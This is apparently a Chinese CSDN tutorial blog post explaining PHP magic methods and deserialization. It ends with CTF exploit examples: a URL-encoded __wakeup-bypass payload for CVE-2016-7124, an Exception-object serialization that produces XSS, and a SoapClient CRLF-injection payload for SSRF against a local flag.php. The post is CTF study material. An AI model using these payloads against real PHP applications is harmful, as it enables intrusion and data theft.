PHP反序列化&魔术方法&原生类(二)

最新推荐文章于 2023-07-02 18:38:24 发布
最新推荐文章于 2023-07-02 18:38:24 发布
阅读量348 收藏
点赞数 1
分类专栏: 基础的渗透测试 文章标签: php java 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63917373/article/details/127860874
版权

php反序列化(二)

__construct方法

只要new一个实例对象,就会自动调用__contruct方法

__destruct方法:

当删除一个对象或对象操作终止时被调用。其最主要的作用是拿来做垃圾回收机制。

当对象销毁时会调用此方法

一是用户主动销毁对象,二是当程序结束时由引擎自动销毁

利用方法:

1.主动销毁unset

2.程序结束自动销毁 new()

class Test{

public $name;

public $age;

public $string;

// __construct:实例化对象时被调用.其作用是拿来初始化一些值。

public function __construct($name, $age, $string){

echo "__construct 初始化"."<br>";

$this->name = $name;

$this->age = $age;

$this->string = $string;

}

function __destruct(){

echo "__destruct 类执行完毕"."<br>";

}

}

// 主动销毁unset

$test = new Test("Spaceman",566, 'Test String');

unset($test); //unset销毁

echo '第一种执行完毕'.'<br>';

echo '----------------------<br>';

// 程序结束自动销毁

$test = new test("Spaceman",566, 'Test String');

echo '第二种执行完毕'.'<br>';

*/

__toString():在对象当做字符串的时候会被调用

利用:

1.echo

class Test

{

public $variable = 'This is a string';

public function good(){

echo $this->variable . '<br />';

}

// 在对象当做字符串的时候会被调用

public function __toString()

{

return '__toString <br>';

}

}

$a = new Test();

$a->good();

//输出调用

echo $a;

*/

__CALL 魔术方法 调用某个方法, 若方法存在,则直接调用;若不存在,则会去调用__call函数

class Test{

public function good($number,$string){

echo '存在good方法'.'<br>';

echo $number.'---------'.$string.'<br>';

}

// 当调用类中不存在的方法时,就会调用__call();

public function __call($method,$args){

echo '不存在'.$method.'方法'.'<br>';

var_dump($args);

}

}

$a = new Test();

$a->good(566,'nice');

$b = new Test();

$b->spaceman(899,'no');

*/

__get() 魔术方法 读取一个对象的属性时,

若属性存在,则直接返回属性值;

若不存在,则会调用__get函数

class Test {

public $n=123;

// __get():访问不存在的成员变量时调用

public function __get($name){

echo '__get 不存在成员变量'.$name.'<br>';

}

}

$a = new Test();

// 存在成员变量n,所以不调用__get

echo $a->n;

echo '<br>';

// 不存在成员变量spaceman,所以调用__get

echo $a->spaceman;

*/

__set()魔术方法 设置一个对象的属性时,

若属性存在,则直接赋值;

若不存在,则会调用__set函数。

class Test{

public $data = 100;

protected $noway=0;

// __set():设置对象不存在的属性或无法访问(私有)的属性时调用

/* __set($name, $value)

* 用来为私有成员属性设置的值

* 第一个参数为你要为设置值的属性名,第二个参数是要给属性设置的值,没有返回值。

public function __set($name,$value){

echo '__set 不存在成员变量 '.$name.'<br>';

echo '即将设置的值 '.$value."<br>";

$this->noway=$value;

}

public function Get(){

echo $this->noway;

}

}

$a = new Test();

// 读取 noway 的值,初始为0

$a->Get();

echo '<br>';

// 无法访问(私有)noway属性时调用,并设置值为899

$a->noway = 899;

// 经过__set方法的设置noway的值为899

$a->Get();

echo '<br>';

// 设置对象不存在的属性spaceman

$a->spaceman = 566;

// 经过__set方法的设置noway的值为566

$a->Get();

*/

__sleep():serialize之前被调用,(使用serialize时,就会调用__sleep)可以指定要序列化的对象属性。

class Test{

public $name;

public $age;

public $string;

// __construct:实例化对象时被调用.其作用是拿来初始化一些值。

public function __construct($name, $age, $string){

echo "__construct 初始化"."<br>";

$this->name = $name;

$this->age = $age;

$this->string = $string;

}

// __sleep() :serialize之前被调用,可以指定要序列化的对象属性

public function __sleep(){

echo "当在类外部使用serialize()时会调用这里的__sleep()方法<br>";

// 例如指定只需要 name 和 age 进行序列化,必须返回一个数值

return array('name', 'age');

}

}

$a = new Test("Spaceman",566, 'Test String');

echo serialize($a);

*/

__wakeup:反序列化恢复对象之前调用该方法(使用unserialize()方法时)

class Test{

public $sex;

public $name;

public $age;

public function __construct($name, $age, $sex){

$this->name = $name;

$this->age = $age;

$this->sex = $sex;

}

public function __wakeup(){

echo "当在类外部使用unserialize()时会调用这里的__wakeup()方法<br>";

$this->age = 566;

}

}

$person = new Test('spaceman',21,'男');

$a = serialize($person);

echo $a."<br>";

var_dump (unserialize($a));

*/

__isset(): 检测对象的某个属性是否存在时执行此函数。

当对不可访问属性调用 isset() 或 empty() 时,__isset() 会被调用

class Person{

public $sex;

private $name;

private $age;

public function __construct($name, $age, $sex){

$this->name = $name;

$this->age = $age;

$this->sex = $sex;

}

// __isset():当对不可访问属性调用 isset() 或 empty() 时,__isset() 会被调用。

public function __isset($content){

echo "当在类外部使用isset()函数测定私有成员 {$content} 时,自动调用<br>";

return isset($this->$content);

}

}

$person = new Person("spaceman", 25,'男');

// public 成员

echo ($person->sex),"<br>";

// private 成员

echo isset($person->name);

*/

__unset():在不可访问的属性(private)上使用unset()时触发 销毁对象的某个属性时执行此函数

class Person{

public $sex;

private $name;

private $age;

public function __construct($name, $age, $sex){

$this->name = $name;

$this->age = $age;

$this->sex = $sex;

}

// __unset():销毁对象的某个属性时执行此函数

public function __unset($content) {

echo "当在类外部使用unset()函数来删除私有成员时自动调用的<br>";

echo isset($this->$content)."<br>";

}

}

$person = new Person("spaceman", 21,"男"); // 初始赋值

echo "666666<br>";

unset($person->name);//调用 属性私有

unset($person->age);//调用 属性私有

unset($person->sex);//不调用 属性共有,不会执行__unset函数

*/

__INVOKE():将对象当做函数来使用时执行此方法,通常不推荐这样做。

class Test{

// _invoke():以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用

public function __invoke($param1, $param2, $param3)

{

echo "这是一个对象<br>";

var_dump($param1,$param2,$param3);

}

}

$a = new Test();

$a('spaceman',21,'男'); //a为对象,将a当做了方法

*/

?>

#方法&属性-调用详解&变量数据详解

对象变量属性:

public(公共的):在本类内部、外部类、子类都可以访问

protect(受保护的):只有本类或子类或父类中可以访问

private(私人的):只有本类内部可以使用

序列化数据显示:

private属性序列化的时候格式是%00类名%00成员名

protect属性序列化的时候格式是%00*%00成员名

具体代码:

<?php

header("Content-type: text/html; charset=utf-8");

/*public private protected说明

class test{

public $name="xiaodi";

private $age="29";

protected $sex="man";

}

$a=new test();

$a=serialize($a);

print_r($a);

*/

O:4:"test":3:{s:4:"name";s:6:"xiaodi";s:9:"testage";s:2:"29";s:6:"*sex";s:3:"man";}

实际上:

age= %00test%00age

sex=%00*%00sex

#CTF-语言漏洞-__wakeup()方法绕过

[极客大挑战 2019]PHP CVE-2016-7124

如果存在__wakeup方法,调用unserilize()方法前则先调用__wakeup方法,

但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

1、下载源码分析,触发flag条件

2、分析会触发调用__wakeup 强制username值

3、利用语言漏洞绕过 CVE-2016-7124

4、构造payload后 修改满足漏洞条件触发

Pyload:

select=O%3A4%3A"Name"%3A3%3A%7Bs%3A14%3A"%00Name%00username"%3Bs%3A5%3A"admin"%3Bs%3A14%3A"%00Name%00password"%3Bi%3A100%3B%7D

#CTF-方法原生类-获取&利用&配合其他

参考案例:https://www.anquanke.com/post/id/264823

-PHP有那些原生类-见脚本使用

-常见使用的原生类-见参考案例

-原生类该怎么使用-见官方说明

0、生成原生类

<?php

$classes = get_declared_classes();

foreach ($classes as $class) {

$methods = get_class_methods($class);

foreach ($methods as $method) {

if (in_array($method, array(

'__destruct',

'__toString',

'__wakeup',

'__call',

'__callStatic',

'__get',

'__set',

'__isset',

'__unset',

'__invoke',

'__set_state'

))) {

print $class . '::' . $method . "\n";

}

}

}

1、本地Demo-xss

<?php

highlight_file(__file__);

$a = unserialize($_GET['k']);

echo $a;

?>

-输出对象可调用__toString

-无代码通过原生类Exception

-Exception使用查询编写利用

-通过访问触发输出产生XSS漏洞

<?php

$a=new Exception("<script>alert('xiaodi')</script>");

echo urlencode(serialize($a));

?>

2CTFSHOW-259

-不存在的方法触发__call

-无代码通过原生类SoapClient

-SoapClient使用查询编写利用

-通过访问本地Flag.php获取Flag

<?php

$ua="aaa\r\nX-Forwarded-For:127.0.0.1,127.0.0.1\r\nContent-Type:application/x-www-form-urlencoded\r\nContent-Length:13\r\n\r\ntoken=ctfshow";

$client=new SoapClient(null,array('uri'=>'http://127.0.0.1/','location'=>'http://127.0.0.1/flag.php','user_agent'=>$ua));

echo urlencode(serialize($client));

?>

大飞先生
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
解析PHP多种序列化与反序列化的方法
12-17
反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。1. serialize和unserialize函数这两个是序列化和反序列化PHP中数据的常用函数。...
CTFSHOW卷王杯 easy unserialize
Landasika的博客
05-17 1245
<?php include("./HappyYear.php"); class one { public $object; public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" &&am...
PHP反序列化漏洞(入门)-魔术方法+原生
xiaoheizi的博客
07-02 1495
_sleep(): //serialize()函数会检查中是否存在一个魔术方法__sleep() 如果存在,该方法会被优先调用。当对不可访问属性调用 isset() 或 empty() 时,__isset() 会被调用。因为__toString()魔术方法是在把对象当做字符串使用的时候会被调用,所以这里会触发__toString()魔术方法。__isset(): //在不可访问的属性上调用isset()或empty()触发。
深入了解PHP反序列化原生
we
06-05 1349
如果在代码审计或者ctf中,有反序列化的功能点,但是却不能构造出完整的pop链,那这时我们应该如何破局呢?我们可以尝试一下从php原生下手,php有些原生中内置一些魔术方法,如果我们巧妙构造可控参数,触发并利用其内置魔术方法,就有可能达到一些我们想要的目的。1234567891011我们采用下面脚本遍历一下所有原生中的魔术方法 Error/ExceptionError 是所有PHP内部错误的基。 (PHP 7, 8)**Error::__toString ** error 的字符串表达返回
PHP反序列的两道题
qq_44640313的博客
03-28 419
php反序列化的学习
day45 PHP反序列化&POP链构造&魔术方法&原生
wanjia01的博客
12-09 503
知识点:1、什么是反序列化操作?-格式转换2、为什么会出现安全漏洞?-魔术方法3、反序列化漏洞如何发现?-对象逻辑4、反序列化漏洞如何利用?-POP链构造补充:反序列化利用大概分-魔术方法的调用逻辑-如触发条件-语言原生的调用逻辑-如SoapClient-语言自身的安全缺陷-如CVE-2016-7124#反序列化课程点:序列化:对象转换为数组或字符串等格式反序列化:将数组或字符串等格式转换成对象serialize()//将一个对象转换成一个字符串。
PHP多种序列化/反序列化的方法详解
10-19
本篇文章主要介绍了PHP多种序列化/反序列化的方法详解,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
详解PHP序列化反序列化的方法
12-19
下面说说php 如何进行数据的序列化和反序列化的。 php 将数据序列化和反序列化其实就用到两个函数,serialize 和unserialize。 serialize 将数组格式化成有序的字符串 unserialize 将数组还原成数组 例如: $user=...
php json与xml序列化/反序列化
10-26
在WEB开发中,php对象的序列化与反序列化经常使用,比较主流的有json格式与xml格式的序列化与反序列化。今天我们就来看看是如何用的。
浅谈php原生利用 2(Error&SoapClient&SimpleXMLElement)
weixin_63231007的博客
01-19 2218
CTF中原生Error&SoapClient的一些利用
2021-10-3 安全笔记周报(php 反序列化的两道例题)(待更新)
m0_54481455的博客
10-03 4584
Moectf2021 easyunserialize <?php classentrance { public$start; function__construct($start) { $this->start=$start; } function__destruct() { $this->start->helloworld(); } } c...
ctfshow(卷王杯)
qq_62046696的博客
09-24 1433
首先我们的前提是if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c']))} 这里的name就是上面的string传进来的,但是 $var = $this->$name;array_walk函数的作用就是遍历自定义函数,其中$fn的值为成员的值,prev为成员变量的名字。这是个等于号,相当于赋值,而对于数组无法赋值的情况就是当键溢出就行,可以看到上一句有。如果是数组的话,第一个是,第个是方法,第三个是属性。
浅谈PHP中GC回收机制的利用
errorr0
03-16 2154
GC回收及机制,在ctf中不会单独涉及,但是会糅合起来一起考!
【无标题】
weixin_51387754的博客
09-08 399
ctf可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。
php-SER-libs-main反序列化靶场通关详细思路
qq_73767109的博客
05-30 3615
这里先是要把my实例化到body中,而project要是my中不存在的方法,理应随便赋值但是在触发__call后call需要输入两个参数,name可以自行赋值,但是func就要在触发时就有参数,所以在给project赋值的时候应该赋参数这样在。主要利用的是session.upload_progress.enabled 当该设置为on 的时候,在向服务器上传任意一个文件的时候php会把该上传文件的详细信息(如上传时间,文件名等)储存在session中,而当我们以。新手学习反序列化
web安全-PHP反序列化漏洞
weixin_61956136的博客
07-10 2048
web安全-PHP反序列化漏洞
UnserializeOne
qq_64201116的博客
10-09 1207
_set() 用于将数据写入不可访问的属性 给一个未定义的属性赋值时,此方法会被触发,传递的参数是被设置的属性名和值 // 不存在赋值。__set_state(),调用var_export()导出时,此静态方法会被调用。__isset(),当对不可访问属性调用isset()或empty()时调用。__isset() 在不可访问的属性上调用isset()或empty()触发。__unset(),当对不可访问属性调用unset()时被调用。__invoke(),调用函数的方式调用一个对象时的回应方法。
自动销毁php,php如何实现自动删除文件
weixin_28818559的博客
03-10 267
php实现自动删除文件的方法:首先创建一个PHP示例文件;然后定义一个“del_file_by_time”方法;接着通过“self::del_file_by_time(WEB_ROOT.'/base64/',1);”方法实现自动删除即可。PHP自动删除指定时间以前所有文件或图片在用PHP做文件或图片上传时,有时一些图片是没有用的,或过一段时间想自动清理以前图片或文件,以便节省空间。在每次执行上传图...
PHP原生利用
qq_37466661的博客
08-11 327
PHP原生利用
是否有安全的序列化和反序列化方法
最新发布
04-13
以下是一些常用的安全序列化和反序列化方法: 1. JSON Web Tokens (JWT):JWT是一种基于JSON的开放标准,用于在各方之间安全地传输信息。它可以用于序列化和反序列化数据,并提供了签名和加密机制来确保数据的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大飞先生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值